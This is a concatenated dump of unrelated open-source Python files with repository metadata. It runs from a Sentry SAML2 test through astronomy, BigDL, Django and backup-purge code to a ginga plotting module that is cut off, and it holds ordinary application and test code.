self.url_prefix = settings.SENTRY_OPTIONS.get("system.url-prefix")
settings.SENTRY_OPTIONS.update({"system.url-prefix": "http://testserver.com"})
super(AuthSAML2Test, self).setUp()
def tearDown(self):
# restore url-prefix config
settings.SENTRY_OPTIONS.update({"system.url-prefix": self.url_prefix})
super(AuthSAML2Test, self).tearDown()
@fixture
def login_path(self):
return reverse("sentry-auth-organization", args=["saml2-org"])
@fixture
def acs_path(self):
return reverse("sentry-auth-organization-saml-acs", args=["saml2-org"])
@fixture
def setup_path(self):
return reverse("sentry-organization-auth-provider-settings", args=["saml2-org"])
def test_redirects_to_idp(self):
resp = self.client.post(self.login_path, {"init": True})
assert resp.status_code == 302
redirect = urlparse(resp.get("Location", ""))
query = parse_qs(redirect.query)
assert redirect.path == "/sso_url"
assert "SAMLRequest" in query
def accept_auth(self, **kargs):
saml_response = self.load_fixture("saml2_auth_response.xml")
saml_response = base64.b64encode(saml_response).decode("utf-8")
# Disable validation of the SAML2 mock response
is_valid = "onelogin.saml2.response.OneLogin_Saml2_Response.is_valid"
with mock.patch(is_valid, return_value=True):
return self.client.post(self.acs_path, {"SAMLResponse": saml_response}, **kargs)
def test_auth_sp_initiated(self):
# Start auth process from SP side
self.client.post(self.login_path, {"init": True})
auth = self.accept_auth()
assert auth.status_code == 200
assert auth.context["existing_user"] == self.user
def test_auth_idp_initiated(self):
auth = self.accept_auth()
assert auth.status_code == 200
assert auth.context["existing_user"] == self.user
@mock.patch("sentry.auth.helper.logger")
def test_auth_setup(self, auth_log):
self.auth_provider.delete()
self.login_as(self.user)
data = {"init": True, "provider": self.provider_name}
with Feature(["organizations:sso-basic", "organizations:sso-saml2"]):
setup = self.client.post(self.setup_path, data)
assert setup.status_code == 302
redirect = urlparse(setup.get("Location", ""))
assert redirect.path == "/sso_url"
auth = self.accept_auth(follow=True)
messages = map(lambda m: six.text_type(m), auth.context["messages"])
assert len(messages) == 2
assert messages[0] == "You have successfully linked your account to your SSO provider."
assert messages[1].startswith("SSO has been configured for your organization")
# require 2FA disabled when saml is enabled
org = Organization.objects.get(id=self.org.id)
assert not org.flags.require_2fa.is_set
event = AuditLogEntry.objects.get(
target_object=org.id, event=AuditLogEntryEvent.ORG_EDIT, actor=self.user
)
assert "require_2fa to False when enabling SSO" in event.get_note()
auth_log.info.assert_called_once_with(
"Require 2fa disabled during sso setup", extra={"organization_id": self.org.id}
)
def test_auth_idp_initiated_no_provider(self):
self.auth_provider.delete()
auth = self.accept_auth(follow=True)
assert auth.status_code == 200
messages = map(lambda m: six.text_type(m), auth.context["messages"])
assert len(messages) == 1
assert messages[0] == "The organization does not exist or does not have SAML SSO enabled."
def test_saml_metadata(self):
path = reverse("sentry-auth-organization-saml-metadata", args=["saml2-org"])
resp = self.client.get(path)
assert resp.status_code == 200
assert resp.get("content-type") == "text/xml"
def test_logout_request(self):
saml_request = self.load_fixture("saml2_slo_request.xml")
saml_request = base64.b64encode(saml_request)
self.login_as(self.user)
path = reverse("sentry-auth-organization-saml-sls", args=["saml2-org"])
path = path + "?" + urlencode({"SAMLRequest": saml_request})
resp = self.client.get(path)
assert resp.status_code == 302
redirect = urlparse(resp.get("Location", ""))
query = parse_qs(redirect.query)
assert redirect.path == "/slo_url"
assert "SAMLResponse" in query
updated = type(self.user).objects.get(pk=self.user.id)
assert updated.session_nonce != self.user.session_nonce
|
beeftornado/sentry
|
tests/sentry/web/frontend/test_auth_saml2.py
|
Python
|
bsd-3-clause
| 6,945 | 0.001728 |
#!/usr/bin/env python
from __future__ import print_function, division
import numpy as np
import astropy.cosmology
from astropy import units as u
from astropy import constants as const
def compute_sigma_crit(zl, zs, weights=None, cosmology=None):
"""Compute the critical surface mass density.
Parameters:
===========
zl: float, redshift of the lens
zs: array_like, redshift of the source
cosmology: astropy.cosmology.cosmology, optional, default None will load
astropy default
Returns:
========
sigma_crit: astropy.Quantity, critical surface mass density
"""
zs = np.asarray(zs)
if cosmology is None:
cosmology = astropy.cosmology.default_cosmology.get()
beta = cosmology.angular_diameter_distance_z1z2(zl, zs) \
/ cosmology.angular_diameter_distance(zs)
dl = cosmology.angular_diameter_distance(zl)
avg_beta = np.average(beta, weights=weights)
sigma_crit = const.c**2 / (4 * np.pi * const.G) * 1 / (avg_beta * dl)
return sigma_crit
def correct_delta_sigma(delta_sigma, sigma, sigma_crit):
"""
Correct a Delta Sigma profile for the effect of reduced shear.
Parameters:
===========
delta_sigma: array_like, Delta Sigma Profile
sigma: array_like, Sigma (Surface Mass Density) Profile
sigma_crit: astropy.units.quantity.Quantity, critical SMD
Returns:
========
delta_sigma_corr: Delta Sigma profile corrected for reduced shear
"""
delta_sigma = u.Quantity(delta_sigma, u.solMass / u.pc**2)
sigma = u.Quantity(sigma, u.solMass / u.pc**2)
delta_sigma_corr = delta_sigma / (sigma_crit - sigma) * sigma_crit
return delta_sigma_corr.to(u.solMass / u.pc**2)
def read_Nz(fname):
"""
Read Nikea(?) format histogram file for N(z) distribution
Parameters:
===========
fname: str, file name of histogram file
Returns:
========
bin_centers: array_like, center of redshift bins
nz: array_like, effective source number in redshift bin
"""
X = np.loadtxt(fname)
bin_centers = (X[:-1, 0] + X[1:, 0]) / 2
nz = X[:-1, 1]
return bin_centers, nz
def reduced_shear_correction_wrapper(z_bin, richness_bin, radius_bin,
jackknife_bin, zl, delta_sigma,
sigma, cosmology=None):
"""
Wrapper function to perform reduced shear correction on Delta Sigma
Profiles
Paramters:
==========
z_bin: int, redshift bin number
richness_bin: int, richness bin number
radius_bin: int, radius bin number
jackknife_bin: int, jackknife bin number
zl: float, lens redshift
delta_sigma: array_like, Delta Sigma profile
sigma: array_like, Sigma (Surface Mass Density) profile
Returns:
========
corrected_delta_sigma: ndarray, Delta Sigma profile with reduced shear
correction applied [Msun / pc**2]
Note:
=====
The profiles are expected to be in Msun / pc**2 or convertible astropy
quantities.
"""
#fname = "pofz_z{%d}_l{%d}_r{%d}_j{%d}.tab".format(z_bin, richness_bin,
fname = "pofz_z%d_l%d_r%d_j%d.tab"%(z_bin, richness_bin,
radius_bin,
jackknife_bin)
bin_centers, weights = read_Nz(fname)
sigma_crit = compute_sigma_crit(zl, bin_centers, weights,
cosmology=cosmology)
print(sigma_crit.unit)
corrected_delta_sigma = correct_delta_sigma(delta_sigma, sigma,
sigma_crit)
return corrected_delta_sigma.value
|
joergdietrich/reduced_shear_correction
|
reduced_shear_correction.py
|
Python
|
mit
| 3,647 | 0.001097 |
#
# Licensed to Intel Corporation under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# Intel Corporation licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from py4j.protocol import Py4JJavaError
from py4j.java_gateway import JavaObject
from py4j.java_gateway import is_instance_of
from py4j.java_collections import ListConverter, JavaArray, JavaList
from pyspark import RDD, SparkContext
from pyspark.serializers import PickleSerializer, AutoBatchedSerializer
from pyspark.sql import DataFrame, SQLContext
from pyspark.mllib.common import callJavaFunc
from pyspark import SparkConf
if sys.version >= '3':
long = int
unicode = str
class JavaValue(object):
def jvm_class_constructor(self):
name = "create" + self.__class__.__name__
print("creating: " + name)
return name
def __init__(self, bigdl_type="float", *args):
self.value = callBigDlFunc(bigdl_type, self.jvm_class_constructor(),
*args)
self.bigdl_type = bigdl_type
class InferenceResult():
def __init__(self, result, count, method):
self.result = result
self.count = count
self.method = method
def __reduce__(self):
return (InferenceResult, (self.result, self.count, self.method))
def __str__(self):
return "result: %s, count: %s, method: %s" % (
self.result, self.count, self.method)
class PySample(object):
def __init__(self, features, label, features_shape, label_shape,
bigdl_type="float"):
self.features = features
self.label = label
self.features_shape = features_shape
self.label_shape = label_shape
self.bigdl_type = bigdl_type
# features is a ndarray
# label is a ndarray
@classmethod
def from_ndarray(cls, features, label, bigdl_type="float"):
return cls(
features=[float(i) for i in features.ravel()],
label=[float(i) for i in label.ravel()],
features_shape=list(features.shape),
label_shape=list(label.shape) if label.shape else [label.size],
bigdl_type=bigdl_type)
@classmethod
def of(cls, features, label, features_shape, bigdl_type="float"):
return cls(
features=[float(i) for i in features],
label=[float(label)],
features_shape=features_shape,
label_shape=[1],
bigdl_type=bigdl_type)
def __reduce__(self):
return (PySample, (
self.features, self.label, self.features_shape, self.label_shape,
self.bigdl_type))
def __str__(self):
return "features: %s, label: %s," \
"features_shape: %s, label_shape: %s, bigdl_type: %s" % (
self.features, self.label, self.features_shape,
self.label_shape,
self.bigdl_type)
_picklable_classes = [
'LinkedList',
'SparseVector',
'DenseVector',
'DenseMatrix',
'Rating',
'LabeledPoint',
'PySample',
'TestResult'
]
def initEngine(nodeNum, coreNum, bigdl_type="float"):
callBigDlFunc(bigdl_type, "initEngine", nodeNum, coreNum)
def calc_spark_conf(coreNum, nodeNum):
print("coreNum:%s, nodeNum: %s" % (coreNum, nodeNum))
sparkConf = SparkConf()
sparkConf.setExecutorEnv("DL_ENGINE_TYPE", "mklblas")
sparkConf.setExecutorEnv("MKL_DISABLE_FAST_MM", "1")
sparkConf.setExecutorEnv("KMP_BLOCKTIME", "0")
sparkConf.setExecutorEnv("OMP_WAIT_POLICY", "passive")
sparkConf.setExecutorEnv("OMP_NUM_THREADS", "1")
sparkConf.setExecutorEnv("DL_CORE_NUMBER", str(coreNum))
sparkConf.setExecutorEnv("DL_NODE_NUMBER", str(nodeNum))
sparkConf.set("spark.shuffle.blockTransferService", "nio")
sparkConf.set("spark.scheduler.minRegisteredResourcesRatio", "1.0")
return sparkConf
def callBigDlFunc(bigdl_type, name, *args):
""" Call API in PythonBigDLAPI """
sc = SparkContext.getOrCreate()
if bigdl_type == "float":
api = getattr(
sc._jvm.com.intel.analytics.bigdl.python.api.PythonBigDLAPI.ofFloat(),
name)
elif bigdl_type == "double":
api = getattr(
sc._jvm.com.intel.analytics.bigdl.python.api.PythonBigDLAPI.ofDouble(),
name)
else:
raise Exception("Not supported bigdl_type: %s" % bigdl_type)
return callJavaFunc(sc, api, *args)
def _java2py(sc, r, encoding="bytes"):
if isinstance(r, JavaObject):
clsName = r.getClass().getSimpleName()
# convert RDD into JavaRDD
if clsName != 'JavaRDD' and clsName.endswith("RDD"):
r = r.toJavaRDD()
clsName = 'JavaRDD'
if clsName == 'JavaRDD':
jrdd = sc._jvm.SerDe.javaToPython(r)
return RDD(jrdd, sc)
if clsName == 'DataFrame':
return DataFrame(r, SQLContext.getOrCreate(sc))
if is_instance_of(sc._gateway, r,
"com.intel.analytics.bigdl.nn.Container"):
from optim.optimizer import Model
return Model.of(r)
if clsName in _picklable_classes:
r = sc._jvm.org.apache.spark.bigdl.api.python.BigDLSerDe.dumps(r)
elif isinstance(r, (JavaArray, JavaList)):
try:
r = sc._jvm.org.apache.spark.bigdl.api.python.BigDLSerDe.dumps(
r)
except Py4JJavaError:
pass # not pickable
if isinstance(r, (bytearray, bytes)):
r = PickleSerializer().loads(bytes(r), encoding=encoding)
return r
def callJavaFunc(sc, func, *args):
""" Call Java Function """
args = [_py2java(sc, a) for a in args]
result = func(*args)
return _java2py(sc, result)
def _to_java_object_rdd(rdd):
""" Return a JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever
the RDD is serialized in batch or not.
"""
rdd = rdd._reserialize(AutoBatchedSerializer(PickleSerializer()))
return \
rdd.ctx._jvm.org.apache.spark.bigdl.api.python.BigDLSerDe.pythonToJava(
rdd._jrdd, True)
def _py2java(sc, obj):
""" Convert Python object into Java """
if isinstance(obj, RDD):
obj = _to_java_object_rdd(obj)
elif isinstance(obj, DataFrame):
obj = obj._jdf
elif isinstance(obj, SparkContext):
obj = obj._jsc
elif isinstance(obj, (list, tuple)):
obj = ListConverter().convert([_py2java(sc, x) for x in obj],
sc._gateway._gateway_client)
elif isinstance(obj, JavaValue):
obj = obj.value
elif isinstance(obj, JavaObject):
pass
elif isinstance(obj, (int, long, float, bool, bytes, unicode)):
pass
else:
data = bytearray(PickleSerializer().dumps(obj))
obj = sc._jvm.org.apache.spark.bigdl.api.python.BigDLSerDe.loads(data)
return obj
|
zhichao-li/BigDL
|
dl/src/main/python/util/common.py
|
Python
|
apache-2.0
| 7,567 | 0.000529 |
def test_delete_first_group(app):
app.session.login(username="admin", password="secret")
app.group.delete_first_group()
app.session.logout()
|
alexzoo/python
|
selenium_tests/test/test_del_group.py
|
Python
|
apache-2.0
| 156 | 0.00641 |
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Static()
result.template = "object/static/structure/dantooine/shared_dant_small_mudhut.iff"
result.attribute_template_id = -1
result.stfName("obj_n","unknown_object")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
obi-two/Rebelion
|
data/scripts/templates/object/static/structure/dantooine/shared_dant_small_mudhut.py
|
Python
|
mit
| 457 | 0.04814 |
import pytest
import socket as s
@pytest.fixture
def socket(request):
_socket = s.socket(s.AF_INET, s.SOCK_STREAM)
def socket_teardown():
_socket.close()
request.addfinalizer(socket_teardown)
return _socket
def test_server_connect(socket):
socket.connect(('127.0.0.1',8123))
assert socket
if not socket:
raise AssertionError()
|
ainich/politraf
|
_test.py
|
Python
|
mit
| 375 | 0.005333 |
from django import template
register = template.Library()
@register.inclusion_tag('admin/cerci_issue/issue/submit_line.html', takes_context=True)
def submit_issue_row(context):
"""
Displays the row of buttons for delete and save.
"""
opts = context['opts']
change = context['change']
is_popup = context['is_popup']
save_as = context['save_as']
ctx = {
'opts': opts,
'show_delete_link': (not is_popup and context['has_delete_permission']
and change and context.get('show_delete', True)),
'show_save_as_new': not is_popup and change and save_as,
'show_save_and_add_another': context['has_add_permission'] and
not is_popup and (not save_as or context['add']),
'show_save_and_continue': not is_popup and context['has_change_permission'],
'is_popup': is_popup,
'show_save': True
}
if context.get('original') is not None:
ctx['original'] = context['original']
return ctx
|
cercisanat/cercisanat.com
|
cerci_admin/templatetags/issue_submit.py
|
Python
|
gpl-3.0
| 1,033 | 0.00484 |
from django.apps import AppConfig
class MemosConfig(AppConfig):
name = 'memos'
|
a-kirin/Dockerfiles
|
sample01/web/sample01/memos/apps.py
|
Python
|
mit
| 85 | 0 |
# Copyright (c) 2013 Matthieu Huguet
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
from .types import BackupCollection, Backup
def run(config):
backups = get_backup_collection(config.backup_dir)
days = backups.days()
if not days:
return 0
days_to_keep = get_days_to_keep(days, config)
if days_to_keep or config.force:
backups_to_remove = backups.except_days(set(days_to_keep))
backups_to_remove.remove_all(config.noop)
return 0
else:
sys.stderr.write("""
WARNING : With the specified retention rules, all the files in the specified
directory will be deleted. If you only specified -m and / or -w, it means that
there is no file in the directory that match your retention rules. Please look
at --day-of-week or --day-of-month options.
If you really know what you are doing, you can use option --force to
remove all your backup files according to your retention rules.
""")
return 1
def get_backup_collection(backup_dir):
daily_backups = BackupCollection()
for file in os.listdir(backup_dir):
fpath = os.path.join(backup_dir, file)
if not os.path.islink(fpath) and os.path.isfile(fpath):
backup = Backup.from_path(fpath)
daily_backups.add(backup)
return daily_backups
def get_days_to_keep(days, config):
days_to_keep = daily_backup_days(days, config.days_retention)
days_to_keep += weekly_backup_days(
days, config.dow, config.weeks_retention)
days_to_keep += monthly_backup_days(
days, config.dom, config.months_retention)
return days_to_keep
def daily_backup_days(days, retention):
return days[:retention]
def weekly_backup_days(days, dow, retention):
weekly_days = [day for day in days if day.isoweekday() == dow]
return weekly_days[:retention]
def monthly_backup_days(days, dom, retention):
monthly_days = [day for day in days if day.day == dom]
return monthly_days[:retention]
|
madmatah/lapurge
|
lapurge/purge.py
|
Python
|
mit
| 3,000 | 0.000333 |
#
# plots.py -- Utility functions for plotting.
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import numpy
import matplotlib as mpl
from matplotlib.figure import Figure
# fix issue of negative numbers rendering incorrectly with default font
mpl.rcParams['axes.unicode_minus'] = False
from ginga.util import iqcalc
from ginga.misc import Callback
class Plot(Callback.Callbacks):
def __init__(self, figure=None, logger=None, width=500, height=500):
Callback.Callbacks.__init__(self)
if figure is None:
figure = Figure()
dpi = figure.get_dpi()
if dpi is None or dpi < 0.1:
dpi = 100
wd_in, ht_in = float(width)/dpi, float(height)/dpi
figure.set_size_inches(wd_in, ht_in)
self.fig = figure
if hasattr(self.fig, 'set_tight_layout'):
self.fig.set_tight_layout(True)
self.logger = logger
self.fontsize = 10
self.ax = None
self.logx = False
self.logy = False
self.xdata = []
self.ydata = []
# For callbacks
for name in ('draw-canvas', ):
self.enable_callback(name)
def get_figure(self):
return self.fig
def get_widget(self):
return self.fig.canvas
def add_axis(self, **kwdargs):
self.ax = self.fig.add_subplot(111, **kwdargs)
return self.ax
def get_axis(self):
return self.ax
def set_axis(self, ax):
self.ax = ax
def set_titles(self, xtitle=None, ytitle=None, title=None,
rtitle=None):
if xtitle is not None:
self.ax.set_xlabel(xtitle)
if ytitle is not None:
self.ax.set_ylabel(ytitle)
if title is not None:
self.ax.set_title(title)
if rtitle is not None:
pass
ax = self.ax
for item in ([ax.title, ax.xaxis.label, ax.yaxis.label] +
ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(self.fontsize)
def clear(self):
self.logger.debug('clearing canvas...')
self.ax.cla()
self.xdata = []
self.ydata = []
def draw(self):
self.fig.canvas.draw()
self.make_callback('draw-canvas')
def plot(self, xarr, yarr, xtitle=None, ytitle=None, title=None,
rtitle=None, **kwdargs):
if self.ax is None:
self.add_axis()
if self.logx:
self.ax.set_xscale('log')
if self.logy:
self.ax.set_yscale('log')
self.xdata = xarr
self.ydata = yarr
self.set_titles(xtitle=xtitle, ytitle=ytitle, title=title,
rtitle=rtitle)
self.ax.grid(True)
self.ax.plot(xarr, yarr, **kwdargs)
for item in self.ax.get_xticklabels() + self.ax.get_yticklabels():
item.set_fontsize(self.fontsize)
# Make x axis labels a little more readable
lbls = self.ax.xaxis.get_ticklabels()
for lbl in lbls:
lbl.set(rotation=45, horizontalalignment='right')
#self.fig.tight_layout()
self.draw()
def get_data(self):
return self.fig, self.xdata, self.ydata
class HistogramPlot(Plot):
def histogram(self, data, numbins=2048,
xtitle=None, ytitle=None, title=None, rtitle=None):
minval = numpy.nanmin(data)
maxval = numpy.nanmax(data)
substval = (minval + maxval)/2.0
data[numpy.isnan(data)] = substval
dist, bins = numpy.histogram(data, bins=numbins, density=False)
# used with 'steps-post' drawstyle, this gives correct histogram-steps
x = bins
y = numpy.append(dist, dist[-1])
self.clear()
self.plot(x, y, alpha=1.0, linewidth=1.0, linestyle='-',
xtitle=xtitle, ytitle=ytitle, title=title, rtitle=rtitle,
drawstyle='steps-post')
class CutsPlot(Plot):
def cuts(self, data,
xtitle=None, ytitle=None, title=None, rtitle=None,
color=None):
"""data: pixel values along a line.
"""
y = data
x = numpy.arange(len(data))
self.plot(x, y, color=color, drawstyle='steps-mid',
xtitle=xtitle, ytitle=ytitle, title=title, rtitle=rtitle,
alpha=1.0, linewidth=1.0, linestyle='-')
class ContourPlot(Plot):
def __init__(self, *args, **kwargs):
super(ContourPlot, self).__init__(*args, **kwargs)
self.num_contours = 8
self.plot_panx = 0
self.plot_pany = 0
self.plot_zoomlevel = 1.0
self.cmap = "RdYlGn_r"
# decent choices: { bicubic | bilinear | nearest }
self.interpolation = "bilinear"
self.cbar = None
def connect_zoom_callbacks(self):
canvas = self.fig.canvas
connect = canvas.mpl_connect
# These are not ready for prime time...
# connect("motion_notify_event", self.plot_motion_notify)
# connect("button_press_event", self.plot_button_press)
connect("scroll_event", self.plot_scroll)
def _plot_contours(self, x, y, x1, y1, x2, y2, data,
num_contours=None):
# Make a contour plot
if num_contours is None:
num_contours = self.num_contours
# TEMP: until we figure out a more reliable way to remove
# the color bar on all recent versions of matplotlib
self.fig.clf()
self.ax = self.cbar = None
if self.ax is None:
self.add_axis()
ht, wd = data.shape
self.ax.set_aspect('equal', adjustable='box')
self.set_titles(title='Contours')
#self.fig.tight_layout()
# Set pan position in contour plot
self.plot_panx = float(x) / wd
self.plot_pany = float(y) / ht
## # SEE TEMP, above
## # Seems remove() method is not supported for some recent
## # versions of matplotlib
## if self.cbar is not None:
## self.cbar.remove()
self.ax.cla()
self.ax.set_axis_bgcolor('#303030')
try:
im = self.ax.imshow(data, interpolation=self.interpolation,
origin='lower', cmap=self.cmap)
# Create a contour plot
self.xdata = numpy.arange(x1, x2, 1)
self.ydata = numpy.arange(y1, y2, 1)
colors = [ 'black' ] * num_contours
cs = self.ax.contour(self.xdata, self.ydata, data, num_contours,
colors=colors
#cmap=self.cmap
)
## self.ax.clabel(cs, inline=1, fontsize=10,
## fmt='%5.3f', color='cyan')
# Mark the center of the object
self.ax.plot([x], [y], marker='x', ms=20.0,
color='cyan')
if self.cbar is None:
self.cbar = self.fig.colorbar(im, orientation='horizontal',
shrink=0.8, pad=0.07)
else:
self.cbar.update_bruteforce(im)
# Make x axis labels a little more readable
lbls = self.cbar.ax.xaxis.get_ticklabels()
for lbl in lbls:
lbl.set(rotation=45, horizontalalignment='right')
# Set the pan and zoom position & redraw
self.plot_panzoom()
except Exception as e:
self.logger.error("Error making contour plot: %s" % (
str(e)))
def plot_contours_data(self, x, y, data, num_contours=None):
ht, wd = data.shape
self._plot_contours(x, y, 0, 0, wd, ht, data,
num_contours=num_contours)
def plot_contours(self, x, y, radius, image, num_contours=None):
img_data, x1, y1, x2, y2 = image.cutout_radius(x, y, radius)
## self._plot_contours(x, y, x1, y1, x2, y2, img_data,
## num_contours=num_contours)
cx, cy = x - x1, y - y1
self.plot_contours_data(cx, cy, img_data,
num_contours=num_contours)
def plot_panzoom(self):
ht, wd = len(self.ydata), len(self.xdata)
x = int(self.plot_panx * wd)
y = int(self.plot_pany * ht)
if self.plot_zoomlevel >= 1.0:
scalefactor = 1.0 / self.plot_zoomlevel
elif self.plot_zoomlevel < -1.0:
scalefactor = - self.plot_zoomlevel
else:
# wierd condition?--reset to 1:1
scalefactor = 1.0
self.plot_zoomlevel = 1.0
xdelta = int(scalefactor * (wd/2.0))
ydelta = int(scalefactor * (ht/2.0))
xlo, xhi = x-xdelta, x+xdelta
# distribute remaining x space from plot
if xlo < 0:
xsh = abs(xlo)
xlo, xhi = 0, min(wd-1, xhi+xsh)
elif xhi >= wd:
xsh = xhi - wd
xlo, xhi = max(0, xlo-xsh), wd-1
self.ax.set_xlim(xlo, xhi)
ylo, yhi = y-ydelta, y+ydelta
# distribute remaining y space from plot
if ylo < 0:
ysh = abs(ylo)
ylo, yhi = 0, min(ht-1, yhi+ysh)
elif yhi >= ht:
ysh = yhi - ht
ylo, yhi = max(0, ylo-ysh), ht-1
self.ax.set_ylim(ylo, yhi)
self.draw()
def plot_zoom(self, val):
self.plot_zoomlevel = val
self.plot_panzoom()
def plot_scroll(self, event):
# Matplotlib only gives us the number of steps of the scroll,
# positive for up and negative for down.
direction = None
if event.step > 0:
#delta = 0.9
self.plot_zoomlevel += 1.0
elif event.step < 0:
#delta = 1.1
self.plot_zoomlevel -= 1.0
self.plot_panzoom()
# x1, x2 = self.ax.get_xlim()
# y1, y2 = self.ax.get_ylim()
# self.ax.set_xlim(x1*delta, x2*delta)
# self.ax.set_ylim(y1*delta, y2*delta)
# self.draw()
return True
def plot_button_press(self, event):
if event.button == 1:
self.plot_x, self.plot_y = event.x, event.y
return True
def plot_motion_notify(self, event):
if event.button == 1:
xdelta = event.x - self.plot_x
#ydelta = event.y - self.plot_y
ydelta = self.plot_y - event.y
self.pan_plot(xdelta, ydelta)
def pan_plot(self, xdelta, ydelta):
x1, x2 = self.ax.get_xlim()
y1, y2 = self.ax.get_ylim()
self.ax.set_xlim(x1+xdelta, x2+xdelta)
self.ax.set_ylim(y1+ydelta, y2+ydelta)
self.draw()
class RadialPlot(Plot):
def plot_radial(self, x, y, radius, image):
img_data, x1, y1, x2, y2 = image.cutout_radius(x, y, radius)
self.ax.cla()
# Make a radial plot
self.ax.set_xlim(-0.1, radius)
self.set_titles(title="Radial plot", xtitle='Radius [pixels]',
ytitle='Pixel Value (ADU)')
self.ax.grid(True)
try:
ht, wd = img_data.shape
off_x, off_y = x1, y1
maxval = numpy.nanmax(img_data)
# create arrays of radius and value
r = []
v = []
for i in range(0, wd):
for j in range(0, ht):
r.append( numpy.sqrt( (off_x + i - x)**2 + (off_y + j - y)**2 ) )
v.append(img_data[j, i])
r, v = numpy.array(r), numpy.array(v)
# compute and plot radial fitting
# note: you might wanna change `deg` here.
coefficients = numpy.polyfit(x=r, y=v, deg=10)
polynomial = numpy.poly1d(coefficients)
x_curve = numpy.linspace(numpy.min(r), numpy.max(r), len(r))
y_curve = polynomial(x_curve)
yerror = 0 # for now, no error bars
self.ax.errorbar(r, v, yerr=yerror, marker='x', ls='none',
color='blue')
self.ax.plot(x_curve, y_curve, '-', color='green', lw=2)
#self.fig.tight_layout()
self.draw()
except Exception as e:
self.logger.error("Error making radial plot: %s" % (
str(e)))
class FWHMPlot(Plot):
def __init__(self, *args, **kwargs):
super(FWHMPlot, self).__init__(*args, **kwargs)
self.iqcalc = iqcalc.IQCalc(self.logger)
def _plot_fwhm_axis(self, arr, iqcalc, skybg, color1, color2, color3):
N = len(arr)
X = numpy.array(list(range(N)))
Y = arr
# subtract sky background
Y = Y - skybg
maxv = Y.max()
# clamp to 0..max
Y = Y.clip(0, maxv)
self.logger.debug("Y=%s" % (str(Y)))
self.ax.plot(X, Y, color=color1, marker='.')
fwhm, mu, sdev, maxv = iqcalc.calc_fwhm(arr)
# Make a little smoother gaussian curve by plotting intermediate
# points
XN = numpy.linspace(0.0, float(N), N*10)
Z = numpy.array([iqcalc.gaussian(x, (mu, sdev, maxv))
for x in XN])
self.ax.plot(XN, Z, color=color1, linestyle=':')
self.ax.axvspan(mu-fwhm/2.0, mu+fwhm/2.0,
facecolor=color3, alpha=0.25)
return (fwhm, mu, sdev, maxv)
def plot_fwhm(self, x, y, radius, image, cutout_data=None, iqcalc=None):
x0, y0, xarr, yarr = image.cutout_cross(x, y, radius)
if iqcalc is None:
iqcalc = self.iqcalc
self.ax.cla()
#self.ax.set_aspect('equal', adjustable='box')
self.set_titles(ytitle='Brightness', xtitle='Pixels',
title='FWHM')
self.ax.grid(True)
# Make a FWHM plot
try:
# get median value from the cutout area
if cutout_data is None:
cutout_data, x1, y1, x2, y2 = image.cutout_radius(x, y, radius)
skybg = numpy.median(cutout_data)
self.logger.debug("cutting x=%d y=%d r=%d med=%f" % (
x, y, radius, skybg))
self.logger.debug("xarr=%s" % (str(xarr)))
fwhm_x, mu, sdev, maxv = self._plot_fwhm_axis(xarr, iqcalc, skybg,
'blue', 'blue', 'skyblue')
self.logger.debug("yarr=%s" % (str(yarr)))
fwhm_y, mu, sdev, maxv = self._plot_fwhm_axis(yarr, iqcalc, skybg,
'green', 'green', 'seagreen')
self.ax.legend(('data x', 'gauss x', 'data y', 'gauss y'),
loc='upper right', shadow=False, fancybox=False,
prop={'size': 8}, labelspacing=0.2)
self.set_titles(title="FWHM X: %.2f Y: %.2f" % (fwhm_x, fwhm_y))
#self.fig.tight_layout()
self.draw()
except Exception as e:
self.logger.error("Error making fwhm plot: %s" % (
str(e)))
class SurfacePlot(Plot):
def __init__(self, *args, **kwargs):
super(SurfacePlot, self).__init__(*args, **kwargs)
self.dx = 21
self.dy = 21
self.floor = None
self.ceiling = None
self.stride = 1
self.cmap = "RdYlGn_r"
def plot_surface(self, x, y, radius, image, cutout_data=None):
Z, x1, y1, x2, y2 = image.cutout_radius(x, y, radius)
X = numpy.arange(x1, x2, 1)
Y = numpy.arange(y1, y2, 1)
X, Y = numpy.meshgrid(X, Y)
try:
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.ticker import LinearLocator, FormatStrFormatter
self.ax = self.fig.gca(projection='3d', axisbg='#808080')
self.ax.set_aspect('equal', adjustable='box')
#self.ax.cla()
self.set_titles(ytitle='Y', xtitle='X',
title='Surface Plot')
self.ax.grid(True)
zmin = numpy.min(Z) if self.floor is None else self.floor
zmax = numpy.max(Z) if self.ceiling is None else self.ceiling
sfc = self.ax.plot_surface(X, Y, Z, rstride=self.stride,
cstride=self.stride,
cmap=self.cmap, linewidth=0,
antialiased=False)
# TODO: need to determine sensible defaults for these based
# on the data
self.ax.zaxis.set_major_locator(LinearLocator(10))
